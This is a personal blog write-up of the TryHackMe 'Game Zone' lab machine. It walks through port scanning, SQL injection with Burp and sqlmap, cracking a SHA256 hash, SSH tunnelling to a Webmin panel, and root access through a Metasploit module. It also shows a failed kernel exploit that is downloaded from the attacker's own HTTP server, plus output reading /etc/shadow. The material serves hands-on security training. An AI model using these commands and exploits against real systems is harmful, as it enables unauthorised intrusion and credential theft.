Advanced_Exploitation--Game_Zone Writeup

OffensivePentesting.ctd

Game Zone


Game Zone



images/47-1.png

Learn to hack into this machine. Understand how to use SQLMap, crack some passwords, reveal services using a reverse SSH tunnel and escalate your privileges to root!




Recon


Recon



nmap -sV -sC -T4 -Pn 10.10.25.213  
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-29 19:27 PKT
Nmap scan report for 10.10.25.213
Host is up (4.0s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:  
|   2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)
|   256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)
|_  256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Game Zone
| http-cookie-flags:  
|   /:  
|     PHPSESSID:  
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.08 seconds
                                                              
                 

Obtain access via SQLi


Obtain access via SQLi



images/48-1.png

+

 images/48-2.png

Using Burp Intruder And Turbo Intruder Extension




Turbo Intruder



It is useful to use this Extension if you do not have Burp Pro.

Moreover, it is way faster than burp intruder

Here is How I Started to Fuzz The SQL Dictionary using Turbo Intruder

images/48-3.png



Here is the Output


images/48-4.png


302 Redirect received instead of incorrect password





Burp Intruder



images/48-5.png


Here is the Output


images/48-6.png






So we have found SQL Injection Lets Get a Shell via SQLmap





SQLmap




we will try to get a Shell using SQLmap

As we got redirecte portal.php

images/48-7.png



We will use its search game review parameter to use in sql injection

A simple way to do it just capture the whole request with Burp save it as a .txt and use this command:

sqlmap -r req.txt --dbms=ifyouknow --os-shell






Did not work

Using SQLMap


Using SQLMap




We're going to use SQLMap to dump the entire database for GameZone.

Using the page we logged into earlier, we're going point SQLMap to the game review search feature.

First we need to intercept a request made to the search feature using BurpSuite.

images/50-1.png


Save this request into a text file. We can then pass this into SQLMap to use our authenticated user session.


images/50-2.png

-r uses the intercepted request you saved earlier

--dbms tells SQLMap what type of database management system it is

--dump attempts to outputs the entire database


images/50-3.png


SQLMap will now try different methods and identify the one thats vulnerable. Eventually, it will output the database.







We have dump the Database

here is an useful output

images/50-4.png



you can us crackstation.net and crack this hash immediately

but we will try to crack it via John and with Hashcat

Cracking a password with JohnTheRipper


Cracking a password with JohnTheRipper



John the Ripper (JTR) is a fast, free and open-source password cracker.


JohnTheRipper is 15 years old and other programs such as HashCat are one of several other cracking programs out there. 


This program works by taking a wordlist, hashing it with the specified algorithm and then comparing it to your hashed password. If both hashed passwords are the same, it means it has found it. You cannot reverse a hash, so it needs to be done by comparing hashes.


Cracking



The Hash
ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14


john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=sha256crypt

Not Worked


john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256


hash.txt - contains a list of your hashes (in your case its just 1 hash)
--wordlist - is the wordlist you're using to find the dehashed value
--format - is the hashing algorithm used. In our case its hashed using SHA256.


Worked

images/51-1.png





Cracking Password with Hashcat Just for Practice


Cracking Password with Hashcat Just for Practice



The Hash
ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14


First we have to analyze the hash we have built in hash analyzer but let's do it from Internet

images/52-1.png


https://www.tunnelsup.com/hash-analyzer/

https://crackstation.net/ It can Directly crack you the password



Cracking



hashcat -m 1400 --attack-mode 0 hash.txt /usr/share/wordlists/rockyou.txt  

as we know it is hash type is Raw-256 hence we used -m 1400



images/52-2.png



Done


videogamer124

Exposing services with reverse SSH tunnels


Exposing services with reverse SSH tunnels



ssh agent47@10.10.99.169

Password= videogamer124

images/53-1.png

Reverse SSH port forwarding specifies that the given port on the remote server host is to be forwarded to the given host and port on the local side.
-L is a local tunnel (YOU <-- CLIENT). If a site was blocked, you can forward the traffic to a server you own and view it. For example, if imgur was blocked at work, you can do ssh -L 9000:imgur.com:80 user@ example.com. Going to localhost:9000 on your machine, will load imgur traffic using your other server.
-R is a remote tunnel (YOU --> CLIENT). You forward your traffic to the other server for others to view. Similar to the example above, but in reverse.




Reverse SSH Tunneling enables you to access remote machines behind NAT. For instance, you can access your office from home. Therefore, Reverse SSH Tunneling is a technique that enables you to SSH your Linux-based system that doesn't have a public IP address.

Remote port forwarding (reverse tunneling) Also often called SSH reverse tunneling, remote port forwarding redirects the remote server's port to the localhost's port. When remote port forwarding is used, at first, the client connects to the server with SSH.


Steps




We will use a tool called ss to investigate sockets running on a host.

If we run ss -tulpn it will tell us what socket connections are running.

ArgumentDescription
-tDisplay TCP sockets
-uDisplay UDP sockets
-lDisplays only listening sockets
-pShows the process using the socket
-nDoesn't resolve service names



What are Sockets?

 (external )

Definition: A socket is one endpoint of a two-way communication link between two programs running on the network. A socket is bound to a port number so that the TCP layer can identify the application that data is destined to be sent to. An endpoint is a combination of an IP address and a port number.

A network socket is one endpoint in a communication flow between two programs running over a network. Sockets are created and used with a set of programming requests or "function calls" sometimes called the sockets application programming interface (API).

( End of External note)





We can see that a service running on port 10000 is blocked via a firewall rule from the outside (we can see this from the IPtable list). However, Using an SSH Tunnel we can expose the port to us (locally)!


From our local machine, run ssh -L 10000:localhost:10000 <username>@<ip>


Once complete, in your browser type "localhost:10000" and you can access the newly-exposed webserver.



CMS



Content Management System (CMS). These web applications are used to manage content on a website. For example, blogs, news sites, e-commerce sites and more!

The full form of CMS is the Content Management System. CMS is a software platform used to handle changes in website content creation, enabling multiple authors to develop, update, and publish material.





Got CMS Login page



credentials accepted user= agent47 pass= videogamer124

images/53-2.png


you can use the credentials for agent47 user and login with it, it will expose you some system info and the server version


images/53-3.png



Now its time to search for potential exploits for this version and specs (kernel etc)






Priv Esc with Metasploit


Priv Esc with Metasploit



https://www.rapid7.com/db/modules/exploit/unix/webapp/webmin_show_cgi_exec/

The options that I have set

images/54-1.png




just run and you will get a Rev Shell with root Privilege

Priv Esc without Metasploit (Failed)


Privilege Escalation without Metasploit




images/56-1.png

We also got some info from the Content Management Server CSM

images/56-2.png



Got This Exploit

https://www.exploit-db.com/exploits/47169


images/56-3.png


The Usage (snipped from code)



// Usage:
// user@ubuntu:~$ uname -a
// Linux ubuntu 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
// user@ubuntu:~$ whoami
// user
// user@ubuntu:~$ id
// uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
// user@ubuntu:~$ gcc pwn.c -o pwn
// user@ubuntu:~$ ./pwn
// [.] starting
// [.] checking kernel version

// root@ubuntu:/home/user# whoami
// root
// root@ubuntu:/home/user# id
// uid=0(root) gid=0(root) groups=0(root)
// root@ubuntu:/home/user# cat /etc/shadow




Time to Exploit




http://10.8.41.9:8000/pwn

- Download a file, saving the output under the filename indicated by the URL:
   curl --remote-name http://example.com/filename

images/56-4.png


Lets run it

images/56-5.png


Failed



It should work on other system with this kernel name

May be it has different kernel, but machine authors may have changed its kernel name to a fake one so it would be a time wasting Rabbit-hole



I have tried all the methods taught by THM in JrPentester path nothing worked, means there is only one priv esc vector which can be achive by metasploit or any other exploits taking benefits of the vulnerable version of CMS server.

Other Interesting Things


images/57-1.png


Data base password 3kSMMS47qZEBgFUe


images/57-2.png




Useful

images/57-3.png


Comments

Post a Comment

Popular posts from this blog

THM JRPentester Intro To Pentesting > Principles of Security

Image
Principles of Security Principles of Security Introduction It outlines some Fundamentals of InfoSec. The measuers, frameworks and protocols that we will discuss, all play small part in “Defence in Depth” Defence in Depth is the use of multiple varied layers of security to protect Organisation's system. The CIA Traid InfoSec model used in the making of Security Policies. This model has an old background dating from 1998/ Reason for its old background is InfoSec is not just about CyberSecurity, it also applies to scenarios like filing record storage etc. It consist upon three sections, C onfidentiality,  I ntegrity and  A vailability ( CIA ), it is Industry Standard model right now, it helps to understand the value of data it applies to and the attention that the data need from the bussiness Unlike traditional models where you have individual sections, It is continous cycle. Confidentiality This element is the protection of data from unauthorized access and misuse. ...
Read more

THM JRPenTester Pentesting Fundamentals Writeup

Image
Pentesting Fundamentals Pentesting Fundamentals What is PenTesting Ans: Finding the Vulnerability in the system and using the right mitigations is known as PenTest. A Pentester will use the same waepons and tactics just like an Black hat hacker use. According to Security Magazine , a cybersecurity industry magazine, there are over 2,200 cyber attacks every day - 1 attack every 39 seconds. https://www.securitymagazine.com/articles/87787-hackers-attack-every-39-seconds Penetration Testing Ethics Hat Category Description Example White Hat These hackers are considered the "good people". They remain within the law and use their skills to benefit others. For example, a penetration tester performing an authorised engagement on a company. Grey Hat These people use their skills to benefit others often; however, they do not respect/follow the...
Read more